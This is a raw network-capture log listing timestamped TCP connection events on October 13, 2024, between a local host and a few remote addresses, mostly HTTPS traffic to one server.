                                                                                                                          Oct 13, 2024 18:21:42.466263056 CEST49839443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.466279984 CEST4434983913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.466816902 CEST49839443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.466821909 CEST4434983913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.482794046 CEST4434983513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.482953072 CEST4434983513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.483021021 CEST49835443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.483135939 CEST49835443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.483186960 CEST4434983513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.483217955 CEST49835443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.483233929 CEST4434983513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.486120939 CEST49841443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.486221075 CEST4434984113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.486319065 CEST49841443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.486463070 CEST49841443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.486488104 CEST4434984113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.535116911 CEST4434983613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.535187006 CEST4434983613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.535242081 CEST49836443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.535372972 CEST49836443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.535382032 CEST4434983613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.535418987 CEST49836443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.535424948 CEST4434983613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.537729979 CEST49842443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.537816048 CEST4434984213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.537914991 CEST49842443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.538013935 CEST49842443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.538037062 CEST4434984213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.555627108 CEST4434983813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.555684090 CEST4434983813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.555774927 CEST49838443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.555824995 CEST49838443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.555839062 CEST4434983813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.555865049 CEST49838443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.555871010 CEST4434983813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.557835102 CEST49843443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.557879925 CEST4434984313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.558063984 CEST49843443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.558196068 CEST49843443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.558213949 CEST4434984313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.564201117 CEST4434983713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.564548969 CEST4434983713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.564609051 CEST49837443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.564630032 CEST49837443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.564634085 CEST4434983713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.564659119 CEST49837443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.564661980 CEST4434983713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.566778898 CEST49844443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.566807032 CEST4434984413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.566941977 CEST49844443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.567013025 CEST49844443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.567022085 CEST4434984413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.581899881 CEST4434983913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.582057953 CEST4434983913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.582144976 CEST49839443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.582274914 CEST49839443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.582279921 CEST4434983913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.582288980 CEST49839443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.582293987 CEST4434983913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.584239006 CEST49845443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.584323883 CEST4434984513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.584403038 CEST49845443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.584564924 CEST49845443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:42.584599018 CEST4434984513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.687153101 CEST4972480192.168.2.4199.232.210.172
                                                                                                                          Oct 13, 2024 18:21:42.692564011 CEST8049724199.232.210.172192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:42.692653894 CEST4972480192.168.2.4199.232.210.172
                                                                                                                          Oct 13, 2024 18:21:43.039213896 CEST44349840172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.039544106 CEST49840443192.168.2.4172.217.16.196
                                                                                                                          Oct 13, 2024 18:21:43.039557934 CEST44349840172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.040005922 CEST44349840172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.040426016 CEST49840443192.168.2.4172.217.16.196
                                                                                                                          Oct 13, 2024 18:21:43.040501118 CEST44349840172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.093147039 CEST49840443192.168.2.4172.217.16.196
                                                                                                                          Oct 13, 2024 18:21:43.401623011 CEST4434984313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.401783943 CEST4434984213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.402024031 CEST4434984413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.402187109 CEST49843443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.402221918 CEST4434984313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.402395964 CEST49842443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.402463913 CEST4434984213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.402883053 CEST49843443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.402889967 CEST4434984313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.402945042 CEST49842443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.402957916 CEST4434984213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.403199911 CEST49844443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.403212070 CEST4434984413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.403517008 CEST4434984513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.403544903 CEST49844443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.403549910 CEST4434984413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.403865099 CEST4434984113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.403882980 CEST49845443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.403918028 CEST4434984513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.404155016 CEST49841443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.404170036 CEST4434984113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.404503107 CEST49845443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.404530048 CEST4434984513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.404680014 CEST49841443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.404690027 CEST4434984113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.727829933 CEST4434984413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.728008986 CEST4434984413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.728075981 CEST49844443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.728127003 CEST49844443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.728143930 CEST4434984413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.728161097 CEST49844443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.728167057 CEST4434984413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.729245901 CEST4434984313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.729408026 CEST4434984313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.729476929 CEST49843443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.729572058 CEST49843443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.729597092 CEST4434984313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.729614973 CEST49843443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.729623079 CEST4434984313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.730846882 CEST4434984113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.730994940 CEST4434984113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.731139898 CEST49841443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.731255054 CEST49846443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.731318951 CEST4434984613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.731369972 CEST49847443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.731398106 CEST49846443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.731400967 CEST4434984713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.731430054 CEST49841443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.731430054 CEST49841443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.731446981 CEST49847443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.731477022 CEST4434984113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.731506109 CEST4434984113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.731621027 CEST49847443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.731635094 CEST4434984713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.731712103 CEST49846443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.731734991 CEST4434984613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.733222961 CEST4434984513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.733377934 CEST4434984513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.733439922 CEST49845443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.733549118 CEST49848443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.733578920 CEST4434984813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.733581066 CEST49845443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.733582020 CEST49845443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.733597994 CEST4434984513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.733608007 CEST4434984513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.733644962 CEST49848443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.733733892 CEST4434984213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.733822107 CEST49848443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.733834028 CEST4434984813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.733886003 CEST4434984213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.734122038 CEST49842443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.734294891 CEST49842443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.734313965 CEST4434984213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.734338045 CEST49842443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.734352112 CEST4434984213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.735574007 CEST49849443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.735610962 CEST4434984913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.735671043 CEST49849443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.735785961 CEST49849443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.735799074 CEST4434984913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.736557961 CEST49850443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.736572027 CEST4434985013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:43.736628056 CEST49850443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.736728907 CEST49850443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:43.736740112 CEST4434985013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.384955883 CEST4434984613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.385911942 CEST49846443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.385911942 CEST49846443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.386002064 CEST4434984613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.386034966 CEST4434984613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.387943983 CEST4434984713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.388556004 CEST49847443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.388556004 CEST49847443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.388571024 CEST4434984713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.388591051 CEST4434984713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.405839920 CEST4434985013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.406213999 CEST49850443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.406235933 CEST4434985013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.406620979 CEST4434984913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.406668901 CEST49850443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.406675100 CEST4434985013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.406910896 CEST49849443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.406920910 CEST4434984913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.407310963 CEST49849443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.407315016 CEST4434984913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.428917885 CEST4434984813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.429548979 CEST49848443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.429548979 CEST49848443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.429570913 CEST4434984813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.429582119 CEST4434984813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.484201908 CEST4434984613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.484316111 CEST4434984613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.484944105 CEST49846443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.484944105 CEST49846443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.484983921 CEST49846443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.485003948 CEST4434984613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.487468958 CEST49851443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.487518072 CEST4434985113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.487665892 CEST49851443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.487750053 CEST49851443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.487757921 CEST4434985113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.487922907 CEST4434984713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.488003016 CEST4434984713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.488204956 CEST49847443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.488204956 CEST49847443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.488399982 CEST49847443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.488415003 CEST4434984713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.489944935 CEST49852443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.489974976 CEST4434985213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.490123034 CEST49852443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.490180016 CEST49852443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.490187883 CEST4434985213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.508306980 CEST4434985013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.508456945 CEST4434985013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.508688927 CEST49850443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.508728027 CEST49850443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.508728027 CEST49850443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.508744001 CEST4434985013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.508753061 CEST4434985013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.508775949 CEST4434984913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.508914948 CEST4434984913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.509417057 CEST49849443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.509533882 CEST49849443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.509533882 CEST49849443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.509540081 CEST4434984913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.509546995 CEST4434984913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.512737989 CEST49853443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.512737989 CEST49854443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.512826920 CEST4434985313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.512855053 CEST4434985413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.512948990 CEST49853443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.512948990 CEST49854443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.513135910 CEST49853443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.513170004 CEST4434985313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.513215065 CEST49854443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.513240099 CEST4434985413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.535172939 CEST4434984813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.535341978 CEST4434984813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.535449982 CEST49848443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.535449982 CEST49848443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.535511971 CEST49848443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.535531998 CEST4434984813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.537667990 CEST49855443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.537708044 CEST4434985513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:44.537842035 CEST49855443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.537918091 CEST49855443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:44.537931919 CEST4434985513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.214994907 CEST4434985413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.215594053 CEST49854443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.215631962 CEST4434985413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.216557026 CEST49854443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.216573000 CEST4434985413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.218987942 CEST4434985113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.221432924 CEST4434985313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.222538948 CEST49851443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.222553968 CEST4434985113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.222804070 CEST4434985213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.223239899 CEST49851443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.223244905 CEST4434985113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.223830938 CEST49853443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.223848104 CEST4434985313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.224746943 CEST49853443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.224757910 CEST4434985313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.225379944 CEST49852443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.225404024 CEST4434985213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.226301908 CEST49852443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.226308107 CEST4434985213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.268611908 CEST4434985513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.271909952 CEST49855443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.271922112 CEST4434985513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.272557974 CEST49855443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.272563934 CEST4434985513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.315258026 CEST4434985413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.315349102 CEST4434985413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.315504074 CEST49854443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.315742970 CEST49854443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.315768003 CEST4434985413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.315783978 CEST49854443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.315793991 CEST4434985413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.321386099 CEST49856443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.321422100 CEST4434985613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.321471930 CEST49856443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.321928024 CEST49856443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.321938992 CEST4434985613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.322278976 CEST4434985113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.322434902 CEST4434985113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.322453022 CEST4434985313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.322479010 CEST49851443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.322570086 CEST49851443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.322578907 CEST4434985113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.322664976 CEST4434985313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.322714090 CEST49853443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.323693991 CEST49853443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.323718071 CEST4434985313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.323740005 CEST49853443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.323750019 CEST4434985313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.324073076 CEST4434985213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.324152946 CEST4434985213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.324450970 CEST49852443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.324596882 CEST49852443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.324609995 CEST4434985213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.324620008 CEST49852443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.324625015 CEST4434985213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.329511881 CEST49857443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.329541922 CEST4434985713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.329592943 CEST49857443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.331377983 CEST49858443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.331397057 CEST4434985813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.331527948 CEST49858443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.331717014 CEST49857443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.331727982 CEST4434985713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.332541943 CEST49859443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.332567930 CEST4434985913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:45.332627058 CEST49859443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:45.332793951 CEST49859443192.168.2.413.107.246.60
